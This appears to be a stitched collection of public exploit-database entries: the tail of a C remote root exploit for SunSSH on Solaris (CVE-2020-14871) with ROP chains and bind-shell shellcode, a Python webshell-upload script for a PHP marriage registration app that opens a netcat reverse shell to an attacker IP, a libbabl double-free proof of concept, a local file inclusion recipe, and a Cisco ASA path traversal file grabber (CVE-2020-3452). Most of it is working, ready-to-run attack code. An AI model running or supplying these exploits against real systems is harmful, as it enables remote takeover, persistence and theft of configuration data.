"\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
"\x93\xdb\xc8\xfe" // pop %edx ; ret
"\x01\x30\x04\x08" // ptr to shellcode
"\xe0\xe8\x3e\xfe" // mov $0x72,%al
"\x64\x7c\xc3\xfe" // inc %eax ; ret
"\x64\x7c\xc3\xfe" // inc %eax ; ret
"\x22\x9d\xd3\xfe"},// sysenter
{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
"\x41\x42\x43\x44" // %ebx overwrite unused
"\x41\x42\x43\x44" // %esi overwrite unused
"\xf8\x32\x04\x08" // %ebp overwrite unused
"\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret
"\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7)
"\x01\x30\x04\x08" // ptr for %edx
"\x44\x43\x42\x41" // ptr for %ebp unused
"\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret
"\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
"\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret
"\xeb\x30\x04\x08" // shellcode ptr for %edx
"\x1c\x33\x04\x08" // %ebp & used by "leave"
"\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
"\x41\x42\x43\x44" // %esi unused
"\xe0\x30\x04\x08" // shellcode ptr to %ebx
"\xe8\x32\x04\x08" // ptr into %ebp
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
"\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret
"\xfe\xf8\xcf\xfe"},// sysenter
{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
"\xc3\x31\x04\x08" // overwrite %ebp unused
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
"\x29\x28\x07\x08" // pop %ebx ; ret
"\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
"\x01\x30\x04\x08" // %edx pointer to page
"\xb8\x31\x04\x08" // unused %ebp value
"\xaa\x4c\x68\xfe" // pop %ecx ; ret
"\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7)
"\x61\x22\x07\x08" // dec %edx ; ret
"\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
"\xc3\x31\x04\x08" // shellcode addr for %edx
"\xc3\x31\x04\x08" // unused %ebp value
"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
"\xc3\x31\x04\x08" // overwrite %ebp unused
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
"\xb1\x26\x07\x08" // pop %ebx ; ret
"\xff\x01\xac\xfe" // write garbage here, unused gadget
"\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret
"\xff\x2f\x04\x08" // %edx pointer to page
"\xc3\x31\x04\x08" // unused %ebp value
"\x57\xaa\xe4\xfe" // pop %ecx ; ret
"\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7)
"\xee\x6a\x65\xfe" // inc %edx ; ret
"\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
"\x86\xae\xe5\xfe" // pop %edx ; ret
"\xc3\x31\x04\x08" // shellcode return address for %edx
"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
{"Solaris all Sun_SSH_1.x.x debug crash target",
"\x41\x42\x43\x43" // %ebp ptr
"\x78\x79\x80\x81"} // %eip ptr
};
const int shellno = 4;
struct shellcode shellcodes[] = {
{"Solaris x86 bindshell tcp port 9999",
/* mprotect magic stub necessary for payloads expecting +x stack */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
==================================================================
xorl %eax, %eax
xorl %ecx, %ecx
movl $0x08041001, %ebx
movw $0x7001, %ax
movb $0x7,%cl
dec %ebx
dec %eax
pushl %ecx
pushl %eax
pushl %ebx
pushl %ebx
movl %esp, %ecx
xorl %eax, %eax
movb $0x74, %al
int $0x91
*/
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
"\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
"\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
"\xb1\x3a\xfe\xd7\x2a\x95"},
{"Solaris x86 bindshell tcp port 8080",
/* mprotect magic stub necessary for payloads expecting +x stack */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
"\xb1\x3a\xfe\xd7\x44\x60"},
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
{"Solaris 11.0 x86 bindshell tcp port 9999",
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
"\x9f\x56\x1b\x2c\xdf\x8f"},
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
{"Solaris 11.0 x86 bindshell tcp port 4444",
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
"\x0a\x39\x6b\xeb\x53\x6b"}
};
void spawn_shell(int sd) {
#define sockbuflen 2048
int rcv;
char sockbuf[sockbuflen];
fd_set readfds;
memset(sockbuf,0,sockbuflen);
snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
write(sd,sockbuf,strlen(sockbuf));
while (1) {
FD_ZERO(&readfds);
FD_SET(0,&readfds);
FD_SET(sd,&readfds);
select(255,&readfds,NULL,NULL,NULL);
if (FD_ISSET(sd, &readfds)) {
memset(sockbuf,0,sockbuflen);
rcv = read(sd,sockbuf,sockbuflen);
if (rcv <= 0) {
printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
exit(-1);
}
printf("%s",sockbuf);
fflush(stdout);
}
if(FD_ISSET(0,&readfds)) {
memset(sockbuf,0,sockbuflen);
read(0,sockbuf,sockbuflen);
write(sd,sockbuf,strlen(sockbuf));
}
}
}
void bindshell_setup(short port){
oldsd = sd;
sd = socket(AF_INET,SOCK_STREAM,0);
sain.sin_port = htons(port);
if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
printf("[!] fatal bind shell failed\n\e[0m");
exit(-1);
}
printf("[-] connected.. enjoy :)\e[0m\n");
spawn_shell(sd);
}
void on_alarm(int signum){
printf("[+] exploit success, handling payload...\n");
if(ishell==0||ishell==2){
bindshell_setup(9999);
}
if(ishell==1||ishell==3){
bindshell_setup(8080);
}
printf("[-] exploit complete\n\e[0m");
exit(0);
}
void on_interrupt(int signum){
printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
if(sd){
close(sd);
}
if(oldsd){
close(oldsd);
}
exit(0);
}
void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
#define payload_size 4096
int len = strlen(payload);
buf = malloc(payload_size);
char randchar = 'A';
char* randbuf = malloc(2);
if(!buf||!randbuf){
printf("[!] fatal payload buffer error\n");
exit(-1);
}
srand(time(NULL));
memset(buf,'\x00',payload_size);
memset(randbuf,0,2);
printf("[-] shellcode length %d bytes\n",len);
if(len < 512 && payload_size > 1024){
memcpy(buf,payload,len);
for(int i =0;i <= (512 - len);i++){
randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
memcpy(randbuf,&randchar,1);
strcat(buf,randbuf);
}
len = strlen(retaddr);
printf("[-] rop chain length %d\n",len);
if(len + 512 < payload_size){
memcpy((void*)(long)buf+512,(void*)retaddr,len);
len = strlen(buf);
printf("[-] exploit buffer length %d\n",len);
}
else{
printf("[!] exploit buffer miscalculated\n");
exit(-1);
}
}
else{
printf("[!] exploit buffer miscalculated\n");
exit(-1);
}
}
static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
int i = 0;
signal(SIGALRM, &on_alarm);
printf("[+] entering keyboard-interactive authentication.\n");
printf("[-] number of prompts: %d\n", num_prompts);
printf("[-] prompt %d from server: '", i);
fwrite(prompts[i].text, 1, prompts[i].length, stdout);
printf("'\n");
prepare_payload();
//uncomment to pause for gdb debugging
//sleep(10);
responses[i].text = strdup(buf);
responses[i].length = strlen(buf);
printf("[-] sending exploit magic buffer... wait\n");
alarm(5);
}
int main(int argc,char **argv){
int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
char* host;
int i, type, exitcode;
unsigned long hostaddr;
const char *fingerprint;
LIBSSH2_SESSION *session;
LIBSSH2_CHANNEL *channel;
char *exitsignal = (char *)"none";
size_t len;
LIBSSH2_KNOWNHOSTS *nh;
static struct option options[] = {
{"server", 1, 0, 's'},
{"port", 1, 0, 'p'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 'x'},
{"help", 0, 0,'h'}
};
printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
while(rc != -1) {
rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
switch(rc) {
case -1:
break;
case 's':
if(ihost==0){
host = malloc(strlen(optarg) + 1);
if(host){
sprintf(host,"%s",optarg);
ihost = 1;
}
}
break;
case 'p':
port = atoi(optarg);
break;
case 'x':
if(ishell==-1) {
rc = atoi(optarg);
switch(rc){
case 0:
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
if(payload){
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
ishell = rc;
}
break;
case 1:
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
if(payload){
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
ishell = rc;
}
break;
case 2:
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
if(payload){
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
ishell = rc;
}
break;
case 3:
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
if(payload){
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
ishell = rc;
}
break;
default:
printf("[!] Invalid shellcode selection %d\n",rc);
exit(0);
break;
}
}
break;
case 't':
if(itarg==0){
rc = atoi(optarg);
switch(rc){
case 0:
printf("[-] chosen target '%s'\n",targets[rc].name);
retaddr = malloc(strlen(targets[rc].ropchain)+1);
if(retaddr){
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
itarg = rc;
}
break;
case 1:
printf("[-] chosen target '%s'\n",targets[rc].name);
retaddr = malloc(strlen(targets[rc].ropchain)+1);
if(retaddr){
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
itarg = rc;
}
break;
case 2:
printf("[-] chosen target '%s'\n",targets[rc].name);
retaddr = malloc(strlen(targets[rc].ropchain)+1);
if(retaddr){
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
itarg = rc;
}
break;
case 3:
printf("[-] chosen target '%s'\n",targets[rc].name);
retaddr = malloc(strlen(targets[rc].ropchain)+1);
if(retaddr){
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
itarg = rc;
}
break;
case 4:
printf("[-] chosen target '%s'\n",targets[rc].name);
retaddr = malloc(strlen(targets[rc].ropchain)+1);
if(retaddr){
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
itarg = rc;
}
break;
default:
printf("[!] Invalid target selection %d\n", rc);
exit(0);
break;
}
itarg = 1;
}
break;
case 'h':
printf("[!] Usage instructions.\n[\n");
printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]);
printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n");
printf("[ --shellcode|-x <shellcode#>\n[\n");
printf("[ Target#'s\n");
for(i = 0;i <= targetno - 1;i++){
printf("[ %d \"%s\"\n",i,targets[i]);
}
printf("[\n[ Shellcode#'s\n");
for(i = 0;i <= shellno - 1;i++){
printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
}
printf("\e[0m");
exit(0);
break;
default:
break;
}
}
if(itarg != 1 || ihost != 1 || ishell < 0){
printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
exit(-1);
}
rc = libssh2_init(0);
hostaddr = inet_addr(host);
sd = socket(AF_INET, SOCK_STREAM, 0);
sain.sin_family = AF_INET;
sain.sin_port = htons(port);
sain.sin_addr.s_addr = hostaddr;
if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
fprintf(stderr, "[!] failed to connect!\n");
goto shutdown;
}
session = libssh2_session_init();
libssh2_session_set_blocking(session, 1);
while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
if(rc) {
printf("[!] failure establishing ssh session: %d\n", rc);
goto shutdown;
}
nh = libssh2_knownhost_init(session);
if(!nh) {
printf("[!] failure on libssh2 init\n");
goto shutdown;
}
fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
printf("[+] ssh host fingerprint: ");
for(i = 0; i < 20; i++) {
printf("%02x", (unsigned char)fingerprint[i]);
}
printf("\n");
libssh2_knownhost_free(nh);
signal(SIGINT,&on_interrupt);
libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
printf("[!] exploit failed, core maybe on target!\n");
shutdown:
if(sd){
close(sd);
}
printf("\e[0m");
return -2;
}
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server
#!/usr/bin/python3
import requests
import sys
import os
import iterm2
import AppKit
url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3]
# CONFIGURE HERE
reverse_ip = '192.168.xx.xx'
reverse_port = 4444
# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'
def login(url, mobile, password):
url = "{}/user/login.php".format(url)
payload = {'mobno':mobile, 'password':password, 'login':''}
req = requests.post(url, data=payload)
cookie = req.cookies['PHPSESSID']
return cookie
def upload(url, cookie, file=None):
f = open(file, 'rb')
filename, ext = os.path.splitext(file)
if "exe" in ext:
content_type = 'application/octet-stream'
else:
content_type = 'application/x-php'
cookie = {'PHPSESSID':cookie}
url = "{}/user/marriage-reg-form.php".format(url)
files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
req = requests.post(url, data=payload, cookies=cookie, files=files)
print(f'[+] File {ext} uploaded')
def get_remote_file(url, ext):
url = "{}/user/images".format(url)
req = requests.get(url)
junk = req.text.split(ext)[0]
f = junk[-42:] + ext
return f
def persistence(url, webshell, netcat):
# webshell
payload_w = "copy /y {} shell.php".format(webshell)
url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
req_w = requests.get(url_w)
# netcat
payload_n = "copy /y {} nc.exe".format(netcat)
url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
req_n= requests.get(url_n)
print('[+] Persistence enabled')
def get_reverse(url, ip, port):
payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
print('[+] Reverse shell incoming!')
req = requests.get(url_r)
# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port):
# Launch the app
AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
async def main(connection):
app = await iterm2.async_get_app(connection)
window = app.current_window
if window is not None:
cmd = "nc -lnv {}".format(port)
await window.async_create_tab(command=cmd)
else:
print("No current window")
iterm2.run_until_complete(main)
if __name__ == "__main__":
if len(sys.argv < 3):
print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
else:
cookie = login(url, mobile, password)
upload(url, cookie, netcat_path)
upload(url, cookie, shell_path)
webshell = get_remote_file(url, '.php')
netcat = get_remote_file(url, '.exe')
persistence(url, webshell, netcat)
start_listener(reverse_port)
get_reverse(url, reverse_ip, reverse_port)
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Date: December 14, 2020
# Exploit Author: Carter Yagemann
# Vendor Homepage: https://www.gegl.org
# Software Link: https://www.gegl.org/babl/
# Version: libbabl 0.1.62 and newer
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
/*
* Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
* and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
*
* typedef struct
* {
* char *signature;
* size_t size;
* int (*destructor)(void *ptr);
* } BablAllocInfo;
*
*
* signature is used to track whether a chunk was allocated by babl, and if so, whether
* it is currently allocated or freed. This is done by either pointing it to the global
* string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
*
* Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
*
* void
* babl_free (void *ptr,
* ...)
* {
* ...
* if (freed == BAI (ptr)->signature)
* fprintf (stderr, "\nbabl:double free detected\n");
*
*
* Or so the developers think. As it turns out, because babl internally uses libc's malloc()
* and free(), which has its own data that it stores within freed chunks, most systems will
* overwrite babl's signature variable upon freeing, breaking the double free detection.
* The simple PoC below demonstrates this:
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <babl/babl-memory.h>
int main(int argc, char **argv) {
void *buf = babl_malloc(42);
babl_free(buf);
// BUG: reports an "unknown" pointer warning when the following is clea=
rly a double free
babl_free(buf);
return 0;
}
# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=index
Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
Note: php version < 5.3.3
section class="content">
<div class="container-fluid">
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if(!file_exists($page.".php")){
include '404.html';
}else{
include $page.'.php';
}
?>
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: Freakyclown@cygenta.co.uk
# Vendor Homepage: cisco.com
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452
import requests
# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}"
# Example: CVE-2020-3452.py 192.168.0.12"
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's
# set your target
target = input("Enter target IP/Url: ")
def grabstuff():
for file in files:
print("trying: ", file)
#set request parameters
params = (
('type', 'mst'),
('textdomain', '+CSCOE+/'+file),
('default-language', ''),
('lang', '../'),
)
# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
# write the file to the disk
f = open(file,"w")
f.write(response.text)
f.close()
# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {
"sess_update.html",
"blank.html",
"noportal.html",
"portal_ce.html",
"portal.html",
"logon_custom.css",
"svc.html",
"logo.gif",
"portal_inc.lua",
"nostcaccess.html",
"session.js",
"portal.js",
"portal_custom.css",
"running.conf",
"tlbrportal_forms.js",
"logon_forms.js",
"win.js",
"portal.css",
"lced.html",
"pluginlib.js",
"useralert.html",
"ping.html",
"app_index.html",
"shshimdo_url",
"session_password.html",
"relayjar.html",
"relayocx.html",
"color_picker.js",
"color_picker.html",
"cedhelp.html",
"cedmain.html",
"cedlogon.html",
"cedportal.html",
"portal_elements.html",
"commonspawn.js",
"common.js",
"appstart.js",
"relaymonjar.html",
"relaymonocx.html",
"cedsave.html",
"tunnel_linux.jnlp",
"ask.html",
"no_svc.html",
"preview.html",
"cedf.html",
"ced.html",
"logon_redirect.html",
"logout.html",
"tunnel_mac.jnlp",
"gp-gip.html",
"auth.html",
"wrong_url.html",
"logon.html"}
# obvious thing is obvious, try the things and barf if fail
try:
grabstuff()
except Exception as err:
print("Something went wrong sorry")
print(err)